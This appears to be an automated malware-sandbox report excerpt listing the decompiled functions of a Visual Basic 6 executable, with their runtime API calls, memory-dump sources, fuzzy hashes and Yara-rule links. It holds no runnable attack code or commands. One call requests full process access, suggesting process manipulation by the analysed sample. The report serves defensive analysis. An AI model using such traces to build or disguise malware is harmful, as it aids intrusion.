Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$CallCastChkstkErrorLateList
String ID: [
API String ID: 269068952-784033777
Opcode ID: 5016deb1a59da2f2e0196918561fb49243e5c565f0178785edbf7654f715f660
Instruction ID: 16c54425a3ce120e5e2135e3149755cc9251ea993a7cd341aaf2995901e8571e
Opcode Fuzzy Hash: 5016deb1a59da2f2e0196918561fb49243e5c565f0178785edbf7654f715f660
Instruction Fuzzy Hash: 61512A75900608EBDB10DFA4D948BDEBBB4FF08704F20825DF515AB291D7799A84CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00419626, Relevance: 16.6, APIs: 11, Instructions: 114COMMON

Download Yara Rule

APIs

__vbaAryLock.MSVBVM60(00000000,?), ref: 00419650
__vbaGenerateBoundsError.MSVBVM60 ref: 00419688
__vbaGenerateBoundsError.MSVBVM60 ref: 004196A2
__vbaStrMove.MSVBVM60(?), ref: 004196C9
__vbaAryUnlock.MSVBVM60(00000000), ref: 004196D3
__vbaStrComp.MSVBVM60(00000001,00000000,?), ref: 004196E5
__vbaFreeStr.MSVBVM60 ref: 004196FA
__vbaGenerateBoundsError.MSVBVM60 ref: 00419745
__vbaGenerateBoundsError.MSVBVM60 ref: 0041975F
__vbaCopyBytes.MSVBVM60(00000010,00000000,?), ref: 0041977E
__vbaErase.MSVBVM60(00000000,?), ref: 004197AC
__vbaErase.MSVBVM60(00000000,?), ref: 004197BF
__vbaAryDestruct.MSVBVM60(00000000,?,00419803), ref: 004197F0
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004197FC
__vbaErrorOverflow.MSVBVM60 ref: 0041981A

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$BoundsGenerate$DestructErase$BytesCompCopyFreeLockMoveOverflowUnlock
String ID:
API String ID: 2458773320-0
Opcode ID: 385b518716c5d96581d354086ed4219ffaaac5b28a4e957e8dddbad5aed777d6
Instruction ID: b4eaaf3b6912c0b715553f9d0a6d665ec823eac17e865164621a45f09c466846
Opcode Fuzzy Hash: 385b518716c5d96581d354086ed4219ffaaac5b28a4e957e8dddbad5aed777d6
Instruction Fuzzy Hash: E8510874A10109EFDB08DF94DAA8BEDB7B5FF44301F208199E516AB290CB74AD81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004295B0, Relevance: 16.6, APIs: 11, Instructions: 86COMMON

Download Yara Rule

APIs

__vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 004295F7
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429604
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429611
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0042961E
__vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00429629
__vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,?,00000000), ref: 0042963D
__vbaStrToUnicode.MSVBVM60(004032B6,?,?,00000000,?,00000000,?,00000000), ref: 00429647
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 0042964E
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 00429655
__vbaI2I4.MSVBVM60(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6), ref: 0042965A
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,?,00000000,?,00000000), ref: 00429675

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AnsiUnicode$ErrorFreeListSystem
String ID:
API String ID: 3859701107-0
Opcode ID: 5c61e922defa331cc4ce072f563674e95d7f8f498ef2ac34effc3ba57cb8711b
Instruction ID: 594d62947b0162dfde37296f4cb3f61c41ad37821fc0585372e9270dc8f55869
Opcode Fuzzy Hash: 5c61e922defa331cc4ce072f563674e95d7f8f498ef2ac34effc3ba57cb8711b
Instruction Fuzzy Hash: D031B6B5D10219AFCB04DFA4CD85DEFBBBCEB8C700F10455AE901A7250D674A9058FB4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAA0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040DABE
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0040DB05
__vbaStrCat.MSVBVM60( RU,00000000,?,?,?,?,Function_000032B6), ref: 0040DB1E
__vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DB29

Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7

__vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000,?,?,?,?,Function_000032B6), ref: 0040DB4A
__vbaStrCat.MSVBVM60( RU,00000000,?,?,?,?,Function_000032B6), ref: 0040DB63
__vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DB6E
__vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000,?,?,?,?,Function_000032B6), ref: 0040DB8F

Part of subcall function 00415FD0: __vbaSetSystemError.MSVBVM60(00000000,0040DBA1,?,?,?,?,Function_000032B6), ref: 00415FE5

Part of subcall function 00416100: __vbaSetSystemError.MSVBVM60(00000000,0040DBAD,?,?,?,?,Function_000032B6), ref: 00416115

Strings

RU, xrefs: 0040DB19, 0040DB5E

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$Free$System$AnsiCopyUnicode$ChkstkMove$BstrList
String ID: RU
API String ID: 279242310-1417676127
Opcode ID: 834666a230e91adafad132ac9b958fc5a9d9edbf53aecaab06e1bd8c04ae2b97
Instruction ID: a5e5539ec0bd47771e5bba15ffd7383eda2de6e9d9ac7ceec32cc9b4ad75a0a3
Opcode Fuzzy Hash: 834666a230e91adafad132ac9b958fc5a9d9edbf53aecaab06e1bd8c04ae2b97
Instruction Fuzzy Hash: A7312A71600244EFDB00DF94DE4AF9E7BB8FB48704F60816DF505A72A0CB786A44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00429070, Relevance: 15.1, APIs: 10, Instructions: 72COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0042908E
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,Function_000032B6), ref: 004290D4
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 004290E3
__vbaVarVargNofree.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004290F6
__vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,Function_000032B6), ref: 004290FD
__vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 00429108
__vbaChkstk.MSVBVM60 ref: 00429120
__vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 00429146
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00429152
__vbaFreeObj.MSVBVM60(0042917A,?,?,?,?,?,?,Function_000032B6), ref: 00429173

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkFree$AddrefCopyErrorEventMoveNofreeRaiseVarg
String ID:
API String ID: 3705209087-0
Opcode ID: 81121c5470669a7c16739aa6be5f71145eac563f112db7cdea347d1295e6e5d1
Instruction ID: f347cf2a893cf853362eea099f11493267eac5c9acb7e4d5a4fc20cfa02f8f68
Opcode Fuzzy Hash: 81121c5470669a7c16739aa6be5f71145eac563f112db7cdea347d1295e6e5d1
Instruction Fuzzy Hash: 70310975900209DFDB00DF94C989BDEBBB4FF08314F108269F915A7390C774AA85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041D5B8, Relevance: 13.5, APIs: 9, Instructions: 45COMMON

Download Yara Rule

APIs

__vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5D9
__vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5E1
__vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5E9
__vbaExitProc.MSVBVM60 ref: 0041D5EB
__vbaFreeVar.MSVBVM60(0041D664), ref: 0041D64B
__vbaFreeVar.MSVBVM60 ref: 0041D650
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041D658
__vbaFreeVar.MSVBVM60 ref: 0041D661
__vbaErrorOverflow.MSVBVM60 ref: 0041D680

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AddrefFree$DestructErrorExitOverflowProc
String ID:
API String ID: 2473607959-0
Opcode ID: cb108ea1c80cccade74e7f213af0347de610002038ec2a835772024163612513
Instruction ID: 9264f18109a120e7ce87413fc4b53469814454bba0ef014958fd4b23833393e4
Opcode Fuzzy Hash: cb108ea1c80cccade74e7f213af0347de610002038ec2a835772024163612513
Instruction Fuzzy Hash: A7F04F71C50218AFDB04EBA0ED55BED7B34EF48700F508426E506A70B4EF786A85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428CC0, Relevance: 12.1, APIs: 8, Instructions: 113COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001,?,00402F88,?,?,?,?,?,00000000,004032B6), ref: 00428CF6
__vbaExitProc.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00428D27
__vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00428D42
__vbaOnError.MSVBVM60(00000001), ref: 00428D95
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428DBA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A184,00000094), ref: 00428DE4
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF3
__vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF9

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$CheckExitHresultProc$FreeOverflow
String ID:
API String ID: 1609803294-0
Opcode ID: 21ddd133c35a2055249bfdced58ced3040ae018b58796bb9847fdddddb7096ca
Instruction ID: 288edfe35e9085eef6f99ea30057e2506a503dbf0f3c7e11b8dd8825ff45c2f6
Opcode Fuzzy Hash: 21ddd133c35a2055249bfdced58ced3040ae018b58796bb9847fdddddb7096ca
Instruction Fuzzy Hash: 35417E75E01218EFC710DF98D948A9DBBB8FF58B10F50416BF805B7290CB7859418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404FDC, Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001), ref: 0040D56C
__vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040D584
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5A7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D5CB
__vbaObjSet.MSVBVM60(?,?), ref: 0040D5E2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,0000000C), ref: 0040D5F8
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D608
__vbaExitProc.MSVBVM60 ref: 0040D611

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$ErrorExitFreeListNew2Proc
String ID:
API String ID: 306309671-0
Opcode ID: ca2ad210dbadf10d8339a2c6302259c2d85a358f52ad595904c40038edc4eebe
Instruction ID: d803e8ae1a74f1de2285c6eb7d8813a05e13e9447d060414ac64bef4c706b468
Opcode Fuzzy Hash: ca2ad210dbadf10d8339a2c6302259c2d85a358f52ad595904c40038edc4eebe
Instruction Fuzzy Hash: CB318E70900218FFDB10DF95DD89E9EBBB8FF08B04F10456AF545B7290D77899448BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004250D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

_adj_fdiv_m64.MSVBVM60(72A26C4A,00000000), ref: 0042510E
__vbaR8IntI4.MSVBVM60(x.@,72A26C4A,00000000), ref: 00425122
_adj_fdiv_m64.MSVBVM60 ref: 00425167
__vbaR8IntI4.MSVBVM60 ref: 00425172

Strings

x.@, xrefs: 00425117

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba_adj_fdiv_m64
String ID: x.@
API String ID: 2746309926-3631786054
Opcode ID: 9ac73b9d7d80b49c2d232aa197a81b06f8acdeec819939354fa6ae610ae96cf9
Instruction ID: e2d31677cc0c5545fa80c966f8e09b0dd77fe682f18f487efa9605fdaabcacac
Opcode Fuzzy Hash: 9ac73b9d7d80b49c2d232aa197a81b06f8acdeec819939354fa6ae610ae96cf9
Instruction Fuzzy Hash: CD216831B046119FD7099F14FA4433BBBA6B7C8341F55867EE485D22A4CB788895C749

Uniqueness

Uniqueness Score: -1.00%

Function 004291A0, Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004291EA
__vbaCastObj.MSVBVM60(00000000,0040A2F8,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004291F8
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429203
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429223
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 0042922C
__vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429236
__vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 0042923F

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CastCheckErrorEventExitFreeHresultProcRaise
String ID:
API String ID: 2392155486-0
Opcode ID: 039d90c4dc18c79ec7187133a193b3ab27d0cecebb805d049768fa3ec49b57b7
Instruction ID: 083221939679d71a8f0af14ea155fa08f788ddfb085ab1f4567514e6edbf7ed0
Opcode Fuzzy Hash: 039d90c4dc18c79ec7187133a193b3ab27d0cecebb805d049768fa3ec49b57b7
Instruction Fuzzy Hash: 64119A71940654BBCB00AFA4CE49E9EBBB8FF48B00F10806AF841B22A1C77815408BF9

Uniqueness

Uniqueness Score: -1.00%

Function 00428BBE, Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

__vbaExitProc.MSVBVM60 ref: 00428BBE
__vbaAryDestruct.MSVBVM60(00000000,?,00428C0D), ref: 00428BE2
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BEA
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BF2
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BFA
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428C02
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428C0A

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Destruct$ExitProc
String ID:
API String ID: 1594393734-0
Opcode ID: 952738d25d21216cb59d4962ff70e805ce52a3947e489f7afe1132f397de7233
Instruction ID: 9365795d6c175bddc2ceeb307a93c3593e60e9969e1da01e8ce20a231f89a0e7
Opcode Fuzzy Hash: 952738d25d21216cb59d4962ff70e805ce52a3947e489f7afe1132f397de7233
Instruction Fuzzy Hash: 9BE0ACB29441286AEB4097D0EC41FBD7B3CEB84701F44411AF606AA0989AA42A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00415EC0, Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

__vbaSetSystemError.MSVBVM60(72A26C30,72A26A76,00000000), ref: 00415F0F
__vbaNew2.MSVBVM60(00406520,0042CC34,72A26C30,72A26A76,00000000), ref: 00415F27
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 00415F4C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100), ref: 00415F76
__vbaSetSystemError.MSVBVM60(0000000D,00416130,?,00000000), ref: 00415F8F
__vbaFreeObj.MSVBVM60 ref: 00415F9E

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckErrorHresultSystem$FreeNew2
String ID:
API String ID: 4095944179-0
Opcode ID: 0e2877956f964c667186ba7d453f48a1745dc0f6204dd302438443de716a423e
Instruction ID: 86e52eac19165ff6a91ac7dd53a600c53f32cd3851e5c07b860265a300e2eb8b
Opcode Fuzzy Hash: 0e2877956f964c667186ba7d453f48a1745dc0f6204dd302438443de716a423e
Instruction Fuzzy Hash: AA218674A00645EBCB20DBA4EE89FDEBB74EB58741F50012AF145B31E0D77859428BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4A0, Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0041A8A0,?,?,00000000,Function_000032B6), ref: 0041A4BE
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A4EE

Part of subcall function 0041A2B0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,0041A500,?,?,?,00000000,Function_000032B6), ref: 0041A2CE
Part of subcall function 0041A2B0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A2FE
Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A313
Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,00000028,?,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A32B
Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 0041A37B
Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?), ref: 0041A475

__vbaSetSystemError.MSVBVM60(001F0FFF,00000000,?,?,?,?,00000000,Function_000032B6), ref: 0041A51C
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041A53C
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041A559
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041A575

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$System$Chkstk
String ID:
API String ID: 1207130036-0
Opcode ID: 5bb2bcfdb485b1fc5dace36e1ee00ee028e08319f0daf42fe37a24dbea0d6490
Instruction ID: 0ffcf597171400e777aa296a20f0d346976af0d8bd5363bbaeaa7b020b9ff71b
Opcode Fuzzy Hash: 5bb2bcfdb485b1fc5dace36e1ee00ee028e08319f0daf42fe37a24dbea0d6490
Instruction Fuzzy Hash: 5821D8B5D00648EBDB00EFE5DA49BDEBBB4FB48714F108269E500B7390C7795A44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00429280, Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292BF
__vbaCastObj.MSVBVM60(00000000,0040A2F8,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292CD
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292D8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292F8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429301
__vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429307

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CastCheckErrorExitFreeHresultProc
String ID:
API String ID: 2075080343-0
Opcode ID: 3c98d6e1d880771264c5319e433b74e335411f1da0612e9a017f040162ccee3f
Instruction ID: 9ff539ebce5fad2b4699ffef5be23d845548c77eebf422f0d85762e4eecb91bf
Opcode Fuzzy Hash: 3c98d6e1d880771264c5319e433b74e335411f1da0612e9a017f040162ccee3f
Instruction Fuzzy Hash: 88018B71940214ABCB00AFA4CE48E9EBBB8FF48701F50406AF845B22A0CB7C55008AB9

Uniqueness

Uniqueness Score: -1.00%

Function 004200AF, Relevance: 9.0, APIs: 6, Instructions: 26COMMON

Download Yara Rule

APIs

__vbaFileClose.MSVBVM60(00000000), ref: 004200BC
__vbaFileClose.MSVBVM60(00000000), ref: 004200C6
#529.MSVBVM60(00004008), ref: 004200E2
__vbaExitProc.MSVBVM60 ref: 004200EF
__vbaFreeStr.MSVBVM60(00420142), ref: 00420123
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042013B

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CloseFile$#529DestructExitFreeProc
String ID:
API String ID: 4288299288-0
Opcode ID: 76c3e10c01bdde1d78888b45fc76731c4926e5430ee8ad2130daad78c8bdb4b7
Instruction ID: e63006f6629530c6f9d06262b1e3e783061ea391c4db22c70a24105a95955a76
Opcode Fuzzy Hash: 76c3e10c01bdde1d78888b45fc76731c4926e5430ee8ad2130daad78c8bdb4b7
Instruction Fuzzy Hash: 39F0E775D00218CECF10EFA0DD44BEDB7B8BB48300F4081AAE54AA7560DB741A89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041E67F, Relevance: 9.0, APIs: 6, Instructions: 23COMMON

Download Yara Rule

APIs

__vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041E68B
__vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041E693
__vbaExitProc.MSVBVM60 ref: 0041E695
__vbaFreeVar.MSVBVM60(0041E706), ref: 0041E6F2
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041E6FA
__vbaFreeVar.MSVBVM60 ref: 0041E703

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AddrefFree$DestructExitProc
String ID:
API String ID: 474453485-0
Opcode ID: 080a92c9c3c2fb487e3bc96c2bebb315830741a64646396bf6efebd826edfebc
Instruction ID: 667f1fbceb99d918350a8c93aba1b8ec047f02208f043dfad400775f7d70227f
